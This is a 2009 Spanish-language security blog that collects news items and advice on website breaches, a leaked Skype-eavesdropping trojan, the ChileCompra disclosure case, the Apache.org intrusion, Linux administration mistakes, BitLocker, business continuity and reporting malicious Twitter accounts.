SAFE. Guía para proteger tu vida digital y tu privacidad

31 ago 2009

Ingresan en la web del parlamento británico

Un rumano conocido como Unu, descubre grandes deficiencias en la seguridad de la página de la institución.

Unu ha conseguido entrar en la base de datos de la página electrónica del parlamento británico, dejando en entredicho sus medidas de seguridad, según ha informado el portal Softpedia en su apartado de noticias.

Un rumano, conocido en la web como Unu, ha logrado burlar los sistemas de protección de parliament.uk, la dirección del organismo con sede en Londres. Ha dejado al descubierto varios errores de los responsables de la seguridad, entre ellos que las claves secretas están escritas en texto plano -una imprudencia- y que muchas de estas claves son idénticas al nombre de usuario al que están asociadas.

Cabe destacar que el autor de la intromisión no ha causado ningún daño a la página. Un hacker, a diferencia de un cracker, tiene unos fines éticos y no destructivos, que sí tiene el cracker.

Al parecer, a Unu le gusta probar la resistencia de páginas supuestamente duras de pelar. Entre sus víctimas figuran las web de algunos conocidos periódicos como The International Herald Tribune y The Telegraph o las páginas de conocidas compañías de antivirus como Kaspersky, BitDefender, F-Secure y Symantec.

Fuente: El País

No disparen al webmaster

La seguridad informática es indispensable en cualquier pagina web. No basta el pensar que a nadie le va a interesar mi contenido. Los robots primero disparan, ya que buscan sistemáticamente cualquier puerta de acceso abierta, y luego preguntan.

Hace años que vengo oyendo una máxima entre responsables y propietarios de páginas web, cuando se les menciona la posibilidad de añadir seguridad intrínseca a su sitio web. La respuesta es unánime: «No somos importantes, no somos una gran empresa para que un hacker ponga su vista en nosotros». Cabe encogerse de hombros y suspirar al cielo. Pobres de aquellos que basan su seguridad en la trascendencia de su empresa.

Recuerdo el caso, hace años, de una empresa española de hosting que fue atacada. Su propietario me llamaba desesperado, con la voz todavía temblándole. Al parecer la web de uno de sus clientes había sido craqueada. El hacker en cuestión no sólo había accedido al espacio web, sino que había conseguido ampliarse los permisos de usuario hasta convertirse en «root». Es decir, desde ese instante, era el propietario de todas las páginas web de todos los clientes albergados en esa máquina.

Como uno puede imaginar, el desastre fue total. El hacker se hizo con información privilegiada de muchos clientes, borró y destruyó bases de datos, consultó buzones de correo electrónicos, destrozó el código fuente de las páginas… Aquella escalada de privilegios, como se conoce en el argot informático, le costó un sinfín de demandas jurídicas al propietario de la empresa de hosting. Es más, algunas bases de datos nunca se pudieron recuperar, pues no existían copias de seguridad o eran demasiado antiguas.

Aquellas empresas no pudieron volver a reconstruir sus webs, tal como eran; y siempre anduvieron con el miedo de que sus datos estuvieran siendo compartidos en círculos piratas. Y todo ello fue debido a un ridículo fallo en un sencillo CMS o generador de páginas web open source. A partir de éste, el hacker obtuvo su escalada de privilegios en una sola noche.
Por ello insisto en lo mismo. ¿Seguridad informática por ofuscación? Algunos parecen no entender algo. Que los hackers no buscan una página web concreta. Realizan búsquedas en Google de blogs o CMS con versiones vulnerables, basándose en la etiqueta interna «meta generador» que identifica la versión. Cuando obtienen resultados, simplemente aplican un «exploit» concreto y una vulnerabilidad sencilla de ejecutar, y si lo logran, desfiguran la web con alguna pantalla de su grupo. Es lo que se entiende como «deface». Este juego les sirve para competir contra otros grupos de hackers, publicando sus resultados en sitios como Zone-h.org.

Si además el fallo es grave, alguno de los miembros del grupo volverá para divertirse a solas, alcanzando el estatus de «root». Da pánico pensar en las consecuencias. Por eso es altamente recomendable adoptar medidas de seguridad informática. No es que sea necesario, es que es indispensable.

Es cierto que ya no vivimos en los tiempos de los hackers experimentados, que se pasaban horas examinando un código para conquistar sus objetivos. Pero es peor que los actuales vándalos o grupos de hackers simplemente se dediquen a examinar la Red a la búsqueda de los elementos 2.0 susceptibles de ser craqueados por su sencillez. Y siempre les toca a los mismos gestores. Por algo vivimos en la Web 2.0.

Permítame el lector destacar un par de opciones muy recomendables de cara a aumentar la seguridad de su blog WordPress o su CMS Joomla, a cambio de una inversión mínima. Somos la primera red social sobre seguridad informática, y si quieres saber si tu página web actual o el servidor que la aloja son vulnerables, ponemos a disposición nuestro servicio de auditorías. Por cien euros elaboramos un informe, previo escáner del sitio, donde detallamos los puertos abiertos, los posibles agujeros de seguridad que pudieran encontrarse, y cuál es la solución o parche a aplicar.

Por Carlos Mesa

Fuente: PC Actual

Ofrecen en código abierto sistema de escucha de Skype

Ruben Unteregger, quien durante años trabajó como programador en ERA IT Solutions, ha publicado el código fuente de un programa que puede ser usado para interceptar y escuchar conversaciones vía Skype. El programa puede ser propagado como un troyano.

El troyano se cuelga de distintos procesos de Skype y realiza grabaciones ocultas de las conversaciones realizadas por telefonía IP, transmitiéndolas a un servidor externo como archivos MP3.

En una conversación con el sitio Gulli.com, trasciende que el trabajo de Unteregger en ERA IT Solutions era crear malware que pudiera invadir los PC de usuarios corrientes. La compañía habría dedicado especial atención a la creación de troyanos para escuchar secretamente conversaciones de telefonía IP.

En diversos foros sobre el tema se especula que ERA IT Solutions habría creado tales soluciones por encargo de la policía federal alemana, Bundeskriminalamt, y las autoridades suizas. El propio Unteregger declaró que no está autorizado a hablar sobre el tema.

Con todo, por largo tiempo se ha sabido que la policía alemana y el organismo Eurojust, de la UE, han estudiado posibilidades de escuchar Skype, de la misma forma que pueden hacerlo con las conversaciones telefónicas ordinarias.

Fuente: Diario TI y ZDNET

Facebook cambia sus políticas de privacidad a pedido de Canadá

La red social Facebook aceptó realizar cambios en su plataforma para proteger mejor la información personal de sus usuarios de todo el mundo. La decisión fue resultado de sus negociaciones de la compañía estadounidense con la comisaria canadiense de privacidad Jennifer Stoddart .

Los cambios darán a los usuarios más transparencia y control sobre la información que ofrecen a los creadores de aplicaciones como juegos y cuestionarios, dijo Stoddart. Por su parte, Facebook también aclarará a los usuarios que tienen la opción de eliminar su cuenta y no sólo desactivarla. Además, la información de los no usuarios será protegida de mejor manera.

"Estos cambios implican que la privacidad de 200 millones de usuarios de Facebook en Canadá y alrededor del mundo estarán mejor protegidos", dijo Stoddart en un comunicado .

Hace un tiempo, la comisaria había dicho que la política de Facebook de mantener la información personal de gente que había cerrado su cuenta violaba las leyes canadienses de privacidad.

Asimismo, comentó que la respuesta de la compañía era "aceptable, porque permitiría a los usuarios tomar decisiones y estar informados sobre cómo era tratada su información personal. Este es un cambio a nivel global", afirmó.

Facebook, una página web que permite a los usuarios compartir fotos, videos, noticias, opiniones y mensajes públicos y privados, cuenta con unos 12 millones de usuarios en Canadá, el primer país en realizar una investigación a fondo sobre las prácticas de privacidad del sitio.

El resultado de la investigación canadiense podría influir en las prácticas de la compañía en otros países, al igual que en las de otras redes sociales como MySpace . "Creemos que estos cambios no sólo son buenos para nuestros usuarios y responde a todas las preocupaciones de la comisaria, sino que sienta un precedente para la industria", aseveró Elliot Schrage, vicepresidente de comunicaciones globales y relaciones públicas de Facebook.

El regulador empezó su investigación a Facebook como respuesta a una serie de quejas de la Universidad de Ottawa.

Fuente: La Nación

Condenan a hacker chileno por denunciar falla crítica en portal ChileCompra

El portal ChileCompra nació como una forma de transparentar las adquisiciones que realiza el estado chileno, en el que todas las empresas proveedoras pudieran participar en las licitaciones del Estado de forma transparente y sin que existiera algún tipo de corrupción en el proceso.

El sistema funciona de una manera muy simple: el Estado publica una licitación para la adquisición de un determinado producto, las empresas proveedoras envían sus ofertas (sin que puedan conocer las ofertas de los otros) para, finalmente, el Estado adjudicar aquella que le resultaba más conveniente.

Hasta ahí todo bien pero el Ingeniero Informático Gino Rojas Tilleman descubrió un importante error en el portal, bastaba con cambiar la ID de una licitación en curso (por lo tanto confidencial), por una correspondiente a una licitación cerrada. Con esto se lograba acceder a toda la información de las distintas ofertas presentadas en una licitación, por lo que cualquier proveedor que conociera de esta falla podía presentar una oferta mucho mejor a la de sus competidores.

Rojas se puso en contacto con los encargados del portal para denunciar este hecho, advirtiendo que si el problema no era corregido lo haría público (ver video).

Como suele suceder en estos casos los encargados del portal no tomaron muy en cuenta la denuncia, por lo que Rojas decidió hacerla pública por medio de un video que colgó en la red.

Fue en ese momento que el ministerio público decidió entrar en acción, claro que no investigando el problema que originó toda esta teleserie sino que enjuiciando a Rojas por el supuesto hecho de que se estaba beneficiando del error y que, además, pretendía chantajear al estado.

En Octubre de 2008 se inició el juicio respectivo y esta semana la jueza Claudia Brugueño anunció su veredicto, en el cual se liberó a Rojas de los cargos relacionados con el chantaje pero encontrándolo culpable (ver fallo) de violar Ley de Delitos Informáticos (bajo el argumento que Rojas se apoderó o accedió a información confidencial mediante la explotación de errores de un sistema).

Con esto queda claro que si cualquier persona en Chile encuentra un error en los sistemas informáticos del Estado, debe quedarse callado y aguantarse las ganas de hacerlo público. De lo contrario podría llegar a pasar hasta cinco años tras las rejas, el mismo castigo que podría recibir Rojas una vez que se haga pública su condena.

Actualización Segu-Info 13:00 hs: en 2005 en Argentina se falló sobreseyó a los imputados.

Actualización Segu-Info 15:00 hs: desde el Foro de Segu-Info se están siguiendo las aristas de este tema. ¿Denuncias y vas preso?.

Fuente: Fayerwayer

La defensa de Snow Leopard es muy básica

Por Rosalía Arroyo

La opción antimalware de la última versión del sistema operativo de Apple lanzada el viernes se defiende contra dos troyanos.

Se ha estado hablando de que la versión más reciente de Mac OS X, Snow Leopard, podría incluir una funcionalidad antivirus, pero la realidad es que la función antimalware Apple Xprotect sólo defiende contra dos troyanos. Al menos eso es lo que afirma la empresa de seguridad Sophos.

Para Chet Wisniewski, analista de Sophos, esta opción está pensada para mejorar la seguridad y no como un antivirus. El problema es que la defensa contra el ataque a dos troyanos pudiera llevar al usuario a no utilizar software antivirus.

Aunque Snow Leopard tiene la capacidad de actualizar esta característica para defenderse contra más tipos de malware, Apple ha informado a los vendedores de antivirus que no realizará una competencia directa, de forma que finalmente la opción antimalware de Snow Leopard, lanzada el pasado viernes, es básica.

Por otra parte, también hay que reconocer que históricamente Apple ha tenido menos problemas con los ataques de malware que Windows. Y es que mientras que Apple tiene a su favor varios cientos de virus, el sistema operativo de Microsoft cuenta con más de 22 millones.

Fuente: ITEspresso

Comienza la era del refugiado digital

Los ataques cibernéticos son cada vez más sofisticados - No existe una legislación clara que proteja al cibernauta de los censores


Hasta hace un mes, pocos habían escuchado hablar de Cyxymu. El nombre se refiere a Sujumi, la capital de Abjazia, una de las regiones autónomas de Georgia y es también el nickname utilizado por Georgy, un profesor de Economía de 34 años, que vive en Tbilisi, la capital georgiana. Su blog está escrito en georgiano y en ruso y la mayoría de los mensajes se refieren a recetas de cocina típicas de la región, fotografías antiguas de sus ciudades o vídeos de bailes tradicionales. Pero también habla de algo más: aborda temas de política interior de la región en los que muestra una postura crítica frente a los Gobiernos ruso y georgiano por igual. Y ahí es donde comenzaron sus problemas.


Cyxymu fue señalado como el objetivo de los ataques que colapsaron el popular servicio de micromensajes Twitter y la red social Facebook el 6 de agosto pasado, apenas unos días antes de que se cumpliera un año de la guerra entre Rusia y Georgia. "Nunca me imaginé que el objetivo sería yo", explica por teléfono desde Tbilisi. "Los ataques a mi sitio han sido constantes, pero la sofisticación de este último me ha convencido de que lo ha perpetrado una organización mayor, como el Gobierno ruso". Fueron precisamente estos ataques los que llevaron su nombre a los titulares, pero no era la primera vez que su mensaje había sido atacado. Su blog en Livejournal, uno de los sitios web más populares de Rusia, ya había recibido ataques. Cuando abrió una cuenta en la web Wordpress, el recibimiento fue similar. Los ciberataques fueron lo suficientemente efectivos como para obligar a los dos sitios a cerrar su cuenta.

El mecanismo es sencillo. Los atacantes bombardean a los sitios objetivo con correos basura (spam) a nombre del usuario víctima, hasta causar el colapso de la página web entera.

Tras haber recibido varios de estos ataques y haberse visto obligado a migrar de un sitio web a otro, Cyxymu se ha convertido en el primer "refugiado digital", según describe el especialista en el uso de la web para fines políticos, Evgeny Morozov. "Los ciberataques han resultado una herramienta poderosa para evitar que un mensaje sea difundido sin causar una acusación directa de censura", explica. "La Red es, en teoría, el sitio idóneo para ejercer la libertad de expresión, pero si alguien es silenciado es muy difícil que se le defienda".

La repercusión del caso de Cyxymu ha iniciado un debate en la Red. "Cada vez es más fácil atacar a un blog o sitio en concreto y obligarlos a que cambien de dirección una y otra vez", reconoce Rick Klau, director de blogger.com, el sitio web de bitácoras virtuales de Google. "Mientras las técnicas de censura se vuelven cada vez más sofisticadas, está claro que la libertad de expresión en Internet está en riesgo", explica. "Los ataques que ha recibido Cyxymu reflejan que el poder de los hackers son capaces de colapsar sitios enteros para silenciar a un solo usuario", añade. "Los Gobiernos y las compañías deben comenzar a darse cuenta de las amenazas reales a las que pueden estar sujetos millones de usuarios".

El avance de los controles de censura en la Red han causado que blogueros y autoridades jueguen al gato y al ratón en el ciberespacio. Internet jugó un papel preponderante en las protestas generadas después de las elecciones presidenciales de Irán en junio: desde la organización de los mítines hasta la difusión de la represión de las autoridades. Las primeras imágenes de la joven Neda, abatida a tiros en las calles de Teherán durante uno de los actos, se difundieron por Internet. Y fue precisamente en esta ocasión en que las libertades de la Red quedaron expuestas. El intercambio de ataques entre los disidentes y los censores iraníes causaron el cierre de varios sitios de Internet: desde las redes sociales hasta las páginas oficiales del régimen de Mahmoud Ahmadineyad.

Los participantes en las protestas podían entrar a Internet a través de servidores proxy: un acceso que cambia el identificador (IP) del ordenador por uno distinto para evadir los controles. Algunos blogueros extranjeros prestaron sus propios servidores para ayudar a los usuarios iraníes. "Nunca he estado en Irán, pero se convirtió en un tema muy importante para mí. Quería ayudar", recuerda Austin Heap, informático estadounidense de 27 años. Su participación a distancia en las protestas iraníes le dejó una huella. Ahora, tres meses después, ha creado Haystack, un programa diseñado especialmente para evadir los controles desarrollados en Teherán. "Los mecanismos de censura son distintos en cada país, un programa específico es más efectivo para acceder a la Red", comenta Heap. Haystack está inspirado en Freegate, un programa que persigue el mismo fin que el de Austin Heap, que se desarrolló para evadir el "Gran Firewall chino", quizá el censor más efectivo de Internet. Un usuario iraní opina en la página oficial de Freegate (www.internetfreedom.org) que el programa "salvó vidas en Irán" porque "nos brindó la única forma en que nos podíamos comunicar". El programa Freegate fue desarrollado por informáticos chinos para evadir la censura sobre los sitios del movimiento neobudista Falun Gong. El software es lo suficientemente ligero como para enviarse como un documento adjunto en un correo electrónico. Freegate cambia la dirección IP del usuario cada segundo, lo que lo hace prácticamente imposible de hallar para un censor. La particularidad del servicio causó que, en un primer momento, fuera identificado como un virus, lo que hizo que la ONG que lo desarrolla (el Consorcio por la Libertad en Internet) se reuniera con los fabricantes de antivirus para evitar que fuera considerado como un programa dañino. Su éxito ha sido tal que, pese a que el servicio fue ideado para los utilizaran los usuarios chinos, su popularidad ha llegado a internautas en Myanmar y en Irán. El programa, antes disponible solamente en inglés y mandarín, ahora cuenta también con una versión en farsi.

Aún así, China, el país con el mayor número de usuarios de Internet del mundo (unos 300 millones), cuenta también con uno de los más sofisticados controles de información de la Red. Sólo en el último año, el Gobierno chino reclutó a 10.000 informáticos para trabajar como controladores de contenido en Internet. La censura es tan efectiva que, sólo durante el pasado mes de febrero, Pekín había conseguido cerrar la entrada a unos 1.900 sitios web y unos 250 blogs. Los controles también se hacen cargo de contenidos más concretos. Si se escribe "Tian an men" en la versión china del buscador Google (www.google.cn) aparecerán imágenes de la plaza dignas de una postal y no se hallará ni una palabra sobre alguna protesta con en 1989. El resultado es similar al intentar buscar información sobre el Dalai Lama o la organización religiosa Falun Gong. Incluso, si la búsqueda se hace fuera de China. El recién lanzado buscador Bing, de Microsoft, causó polémica cuando aplicó el mismo criterio censor en la versión estadounidense de la herramienta. No fue sino hasta la queja de varias ONG que corrigieron lo que llamaron "un desafortunado error involuntario".

Pero el control del Gobierno chino no ha parado ahí. El Gobierno de Pekín ha encargado a los fabricantes de ordenadores que los equipos que se vendan en su territorio cuenten con el programa Green Dam (la presa verde) que, según las autoridades chinas, servirá para proteger al usuario de "contenidos pornográficos e información dañina". La ONG Internet Society aseguró que el programa "facilita el espionaje de las actividades cibernéticas" y convierte el Gobierno en el principal vigilante de las actividades del usuario. La Unión Europea ha dicho que el programa estaba claramente diseñado para restringir la libertad de expresión y el Gobierno de EE UU advirtió de que el software podría violar las obligaciones de China en la Organización Mundial de Comercio (OMC). El único fabricante que ha aceptado la iniciativa, la firma japonesa Sony, anunció el pasado julio que instalaría el programa en todos los equipos que vendiera en China para "cumplir con los requisitos del Gobierno".

Pese a contar con una de las comunidades de cibernautas más dinámicas del mundo (existen al menos 70 millones de blogs creados por usuarios chinos), el uso de la herramienta para difundir mensajes críticos con el Gobierno es más bien limitado. Sólo un 5% de los cibernautas chinos utilizan software para evadir a los censores. "El uso de Internet no ha acercado más a China a la democracia", comenta la investigadora de la Universidad de Hong Kong, Rebeca McKinnon. "Si el Gobierno permite la existencia efímera de algún sitio web disidente es sólo para calmar alguna tensión sin permitir que ocurra un cambio real", agrega.

Tanto si provienen de hackers anónimos o de controles gubernamentales, los ataques han demostrado la fragilidad de Internet. "Aún no existen mecanismos sólidos para proteger la libertad de expresión en la Red", asegura Morozov. "La experiencia de Cyxymu en Twitter le dio una notoriedad tal que su cuenta no fue eliminada para evitar el escarnio público, pero muchos otros blogueros han atravesado situaciones similares sin que pase nada", reflexiona.

La mayoría de las redes sociales en Internet, como los sitios de blog, Twitter o Facebook, no se han pronunciado claramente sobre la protección de sus usuarios. Su reacción ante este tipo de ataques ha sido, en la mayoría de los casos, pragmática: borrar el perfil "problemático", especialmente, porque ponerse a resolver esos problemas consume demasiados recursos. "Esa es una decisión errónea. Son precisamente estos usuarios los que necesitan más esa protección. Los blogueros que utilizan la Red para difundir su mensaje son, en muchas ocasiones, los que viven en regímenes con mayor represión", explica Morozov.

Autor: Verónica Calderón
Fuente: El Pais

30 ago 2009

Atacan los servidores de la fundación Apache

Este viernes los servidores de la fundación Apache presentaron durante unas cuantas horas una escueta página informando que se encontraban investigando un incidente en sus servidores.

Aclaraban que no se trataba de un exploit que afectase al popular servidor web, producto de la propia fundación, sino de una llave SSH comprometida.

La llave en cuestión permitía el acceso a una cuenta para efectuar copias de respaldo automáticas del sitio web "ApacheCon", en una máquina situada en un alojamiento externo a la fundación. Dicha máquina fue usada para subir archivos a un servidor de su infraestructura, denominado minotaur.apache.org, con funciones notables, como proveer de cuentas para los "comitters" -cuentas con acceso de escritura a los repositorios de código- y de entrada a los distintos sitios web de la fundación Apache.

Según las primeras investigaciones, fueron creados varios archivos dentro del dominio "www.apache.org", incluyendo varios scripts CGI, que fueron usados para sincronizar dichos archivos con varios servidores en producción e inyectar procesos en los servicios web funcionales.

Tras detectar los procesos que inyectaron los atacantes procedieron a detener los sistemas afectados, de esta manera, por algunos instantes, no se podía acceder a ninguno de los sitios web de Apache, hasta que se procedió a cambiar los DNS hacia una máquina no afectada para mostrar un mensaje informativo indicando la situación en la que se encontraban.

Después de asegurarse de que la infraestructura que la fundación posee en Europa no estaba afectada -los atacantes llegaron a subir los archivos pero no fueron ejecutados-, usaron las copias de respaldo no comprometidas para restaurar los servicios en lo posible, permaneciendo gran parte de su infraestructura detenida para evaluar los daños causados por los atacantes.

Aunque, según Apache, no tienen conocimiento de usuarios finales afectados, ni de que las descargas fueran afectadas, enfatizan efectuar la verificación de la firma digital de los archivos.

apache.org downtime - initial report
https://blogs.apache.org/infra/entry/apache_org_downtime_initial_report

Apache.org hack
http://www.f-secure.com/weblog/archives/00001757.html

David García

Fuente: http://www.hispasec.com/unaaldia/3962/

10 errores comunes en la administración de sistemas GNU/Linux

En laptoplogic.com ha expuesto una relación de 10 errores detectados frecuentemente entre los usuarios noveles de distribuciones GNU/Linux en la administración de nuestros sistemas. Algunos de ellos no son “errores” en el sentido estricto de la palabra pero sí buenas costumbres que, en su opinión, no se siguen habitualmente y que para evitar errores y/o riesgos para la seguridad y estabilidad de nuestro equipo son convenientes. Aquí van sus recomendaciones: >
  • CheckInstall

Cuando 2 ó más aplicaciones instaladas en nuestro equipo están directamente relacionadas en y para su funcionamiento, es necesario que estén todas ellas actualizadas. Cuando instalamos un programa a través del gestor de paquetes que usa nuestra distribución (por ejemplo) y otro programa relacionado con el primero a través de otra fuente, el mencionado gestor de paquetes sólo actualizará el instalado a través de él.

En laptoplogic proponen usar Checkinstall para construir el paquete para nuestra distribución. Aquí ofrecen más info sobre él.

  • Rechazo a la consola

Si bien vimos en esta encuesta que no es el mayor problema para muchos usuarios de GNU/Linux, sí que estamos habituados a oír sobre sobre el pavor que tienen muchos noveles a la terminal. Afortunadamente, también gran parte de ellos cambian de opinión con el tiempo al observar la rapidez y versatilidad que ofrece la línea de comandos.

  • Contraseñas de root débiles

Esto es una cuestión obvia y de sentido común. En algunas ocasiones se hace bueno aquello de “la parte más débil de un SO es su usuario”.

  • Pasar de las actualizaciones

Muchas de las ‘distros’ más masificadas vienen con un update-manager que nos avisa del lanzamiento de actualizaciones para nuestro sistema. Si deshabilitáis el auto-update, comprobad las actualizaciones siempre que podáis.

  • Aplicar cambios sin copia de seguridad previa

De sentido común… el menos común de los sentidos, dicen algunos. Cuántas veces hemos leído en los foros los problemas de los usuarios noveles “se lanzan al vacío sin paracaídas”. Es también de sentido común que si no conocemos al 100% las consecuencias de aplicar un cambio, vayamos sobre seguro; y si las conocemos, también. Aquí os hablamos de varias herramientas para realizar copias de seguridad.

  • No conocer el sistema

Muchas distribuciones parecen similares en un principio pero si se pierde un tiempo para estudiarlas se reconocerán notables diferencias. Si se estudian las particularidades de la ‘distro’ usada será posible para el usuario afrontar posibles futuros problemas.

  • Ignorar los logs

En /var/logs podemos encontrar información sobre el funcionamiento de nuestro equipo. Corregir los errores detectados pueden facilitar la vida al administrador. Echemos un vistazo de vez en cuando.

  • Guardarlo todo en una sola partición

También obedece a las reglas del sentido común. Si instalamos una distribución en nuestro pc, separemos la particón de /home. Esto nos facilitará las cosas en algún momento.

  • Sin precaución con los privilegios de root

Los usuarios con algo de experiencia en GNU/Linux ya conocen la importancia de los privilegios de root. Los recién llegados desde Windows, quizás no.

Fuente: Linux Zone

Bitlocker seguro más alla de su uso

Cuando finalizamos el ciclo de vida de un equipo, ¿qué hacemos?, simplemente nos deshacemos de él. Pero realmente tenemos en cuenta cuál es el destino del mismo, quien lo puede manipular... total si nosotros no lo vamos a utilizar que más da, ya tenemos una copia de los datos y los habremos pasado a nuestro nuevo y flamante equipo. Otras veces un equipo estropeado es enviado a un servicio técnico y desconocemos quien va a manipular la información; o simplemente hemos dejado olvidado nuestro equipo portátil en cualquier lugar o nos lo han robado, ofreciendo eso sí, un acceso total a la información que este contiene (claro y en muchas circunstancias como no con un descriptivo fichero llamado password o con fotos comprometidas,... ya podemos imaginar las consecuencias).

Algunas veces es posible que el propietario de un equipo que se va deshacer de él pudiera llegar a formatear el disco (las menos), pero desconoce realmente, que este mecanismo no garantiza que alguien pudiera llegar a extraer los datos que él tuviera anteriormente almacenado. Algunos estudios revelan informaciones alarmantes que determinan que un gran número de datos médicos, de cuentas corrientes, datos financieros, de empleados, clientes, etc., acaban en cubos de la basura junto a los equipos deshechados o bien camino de algún supuesto país, tras haber hecho una importante donación de los mismos a una nueva Fundación que ha aparecido vaya usted a saber donde, requiriendo de mi empresa los ordenadores en deshuso, y todo esto claro está sin que hagamos ningún tratamiento para la eliminación de los datos almacenados (Dios mío mis datos médicos o financieros camino de... y quien habrá detras de estos envíos).

Dos graduados del Instituto Tecnológico de Massachussets realizaron un estudio con objeto de determinar el alcance de esta problemática, para lo cual compraron 150 discos duros de segunda mano y le aplicaron técnicas de análisis forense para extraer los datos almacenados. En muchas de las circunstancias estos datos no se encontraban ni eliminados y en los que así era, pudieron extraerlos mediante aplicaciones para la recuperación de ficheros. De los discos duros consiguieron extraer una cantidad significativa de datos de tipo confidencial.

Y ahora ¿qué?

Windows Vista en sus versiones Enterprise y Ultimate, incorpora una nueva funcionalidad que entre otras posibles características podría paliar los anteriores escenarios que habíamos planteado: Bitlocker. Este nuevo sistema garantiza la confidencialidad de los datos almacenados en el disco mediante cifrado. Bitlocker utiliza AES (Advance Encription Standard) como algoritmo de cifrado en modo CBC (Cypher Block Chaining) y con objeto de evitar los ataques por manipulación de datos cifrados se incorpora un difusor adicional independiente de AES-CBC.
Los mecanismos de seguridad implementados por Bitlocker se complementan mediante unas nuevas especificaciones de seguridad hardware Trusted Platform Module (TPM). Este nuevo chip TPM proporciona una plataforma segura para el almacenamiento de claves, password o certificados, haciendo más difícil el ataque contra las mismas. Aunque nuestros equipos no dispusieran de este mecanismo de seguridad las especificaciones de Bitlocker admiten su funcionalidad sin el chip TPM, pero ¿funciona igual?

Contenido completo en Trucos Windows

Su empresa ¿está preparada para enfrentar un desastre?

Es usual que en el mundo entero la sensación de inseguridad se esté apoderando del mundo empresarial.

Junto con ello, la competitividad, fomentada por el libre mercado y la globalización son variables que exigen que desde los más altos niveles directivos que las grandes empresas productivas, y de servicios cuenten con una verdadera planificación estratégica que les permita abordar cualquier contingencia que pueda afectar su negocio, tanto en su operacionalidad como administrativamente.

Establecer y coordinar un conjunto de procedimientos y acciones destinadas a impedir, neutralizar y principalmente a reaccionar frente a las posibles amenazas que atenten contra el desarrollo del normal funcionamiento empresarial, de modo de poder asegurar la continuidad de un negocio, es hoy en día fundamental para las empresas que pretender participar en un mundo caracterizado por los efectos crecientes de la globalización, entre los que se destacan, la alta interdependencia de los mercados, y la desagregación productiva.

Sin ir más lejos y continuando con la influencia globalizadora, las nuevas amenazas de carácter asimétrico, los tipos de conflictos y la percepción de los riesgos, hacen evaluar nuevamente el problema de la seguridad.

Hoy en día existe una tendencia ampliacionista del concepto de seguridad, donde los nuevos desafíos de la seguridad internacional, reconocen que tal vez la seguridad requiere de respuestas más eficientes desde el nivel Estatal, institucional, empresarial e incluso llegando hasta el mismo individuo. Por estas razones, la pregunta formulada en el título de este artículo, necesita una respuesta positiva en el mundo empresarial de hoy.

En tal caso, las empresas deben contar con una planificación estratégica, de mediano y largo plazo que sea capaz de definir prioridades, sirviendo de principio orientador para enfrentar una catástrofe natural, un ataque terrorista, o cualquier contingencia que pueda alterar en normal funcionamiento y operacionalidad del negocio.

Para ejemplificar las ideas vertidas en los párrafos anteriores, el detestable ataque a las torres gemelas el 11 S, en Nueva York dejó dos grandes lecciones:

  1. Las empresas deben estar preparadas para seguir operando.
  2. Nadie está a salvo de un ataque terrorista.

Para finalizar, la preparación de un Plan de continuidad y recuperación del negocio es esencial para la empresas y de acuerdo a su nivel deberán al menos aplicar algunos criterios para la elaboración de está importante planificación. Estos criterios pueden ser establecidos de acuerdo a la duración de la crisis, al nivel de impacto en el negocio y en relación al daño causado.

En cuanto a su organización, al menos deberá contar con la organización de:

  • Comité de Crisis (CMT)
  • Centro de Coordinación de Continuidad del Negocio (CPCC)

Por lo general esta planificación debe incluir los siguientes aspectos:

  1. ¿Qué hacer en caso de una crisis que afecte al lugar físico de trabajo?
    1. Site alternativo (Programación por objetivos y actividad)
  2. Procesos Críticos que deben ser mantenidos
  3. Listado de Contactos (organización departamental)
  4. Equipos de Salvataje
  5. Acciones a realizar para reiniciar las actividades (por área)
  6. Procedimientos ante otros riesgos (descripción, quien, tiempo estimado)
  7. Recursos Críticos (Inventario)
    1. ¿Qué recursos deben ser provistos y por quien?
    2. Contratos y Proveedores asociados a procesos críticos

De esta manera es posible al menos enfrentar una crisis y continuar operando basándonos en una planificación preventiva que permita a las empresas seguir compitiendo, brindando servicios a sus clientes y continuando el negocio a pesar de los efectos que un atentado, huracán, terremoto, incendio, aluvión y/o muchas otras amenazas puedan causar.

César Sarriá Moller, autor de esta nota, es Gerente de Seguridad de ING de Chile

Fuente: JurisTelSeg

29 ago 2009

Denuncia de cuentas maliciosas en Twitter

En los últimos días hemos reportado nuevos casos de la utilización de Twitter para conseguir dinero fraudulento. Estos corroboran la tendencia en alza de los últimos meses de utilizar la plataforma de micro-blogging para fines maliciosos, tales como envío de spam o propagación de códigos maliciosos.

Para complementar la información que brindamos periódicamente, informando las alertas de amenazas detectadas, quiero dejarles a continuación una guía sobre cómo denunciar casos de este tipo en Twitter. Convencidos de que la educación de los usuarios es un pilar de la seguridad, les dejo esta breve reseña a fin de que puedan involucrarse en la denuncia de este tipo de actividades.

1. ¿Qué debo hacer si recibo un mensaje de un desconocido en Twitter?

En primer lugar, es necesario leer el contenido del mensaje e identificar de qué se trata: si de una publicidad no deseada (spam) o, más peligroso aún, de ataques de Phishing o la distribución de códigos maliciosos. En este último caso, por lo general el mensaje se compone de una frase llamativa (utilizando alguna técnica de Ingeniería Social) y un enlace a un sitio malicioso que infectará al usuario.

Una vez detectado el mensaje como malicioso, no se debe nunca hacer clic sobre el enlace, ya que el usuario puede infectarse por el solo hecho de visitar el destino.

Posteriormente, es necesario verificar el perfil del usuario (http://twitter.com/usuario) y validar que efectivamente se trata de un perfil utilizado con fines maliciosos. Algunas de las características que pueden ayudar a identificar un usuario de este tipo:

  • El usuario posee pocos followers (otros usuarios que leen sus contenidos)
  • El usuario posee muchos followings (los contenidos que son leídos por el usuario)
  • Frecuentemente, el nombre de usuario es aleatorio, una combinación sin sentido de caracteres
  • El, o los updates, poseen enlaces

Finalmente, se debe denunciar al usuario en Twitter (ver pregunta 3).

2. ¿Qué debo hacer si recibo un mensaje con contenido malicioso o publicitario de un contacto conocido en Twitter?

Probablemente este contacto, ha sido víctima o bien de un robo de credenciales, o de la explotación de vulnerabilidades web en la plataforma. En cualquiera de los casos:

  • No hacer clic en el enlace ya que este puede contener códigos maliciosos
  • Avisar al usuario del incidente, preferentemente por otros medios, y sugerir el cambio de claves de acceso a la cuenta

3. ¿Cómo denuncio si un usuario está enviando publicidad no deseada o distribuyendo malware?

Como otros grandes portales de la Web 2.0, Twitter cuenta con la posibilidad de reportar usuarios que estén violando los términos de servicio, como en los casos que se describieron previamente. Para tal fin, si se detecta un usuario de este tipo es necesario denunciarlos iniciando una nueva solicitud desde el Help Desk de Twitter.

Además, para las denuncias particulares de spam, existe una cuenta para tal fin: @spam. Solo es necesario enviar un mensaje a la misma con el nombre de usuario del spammer.

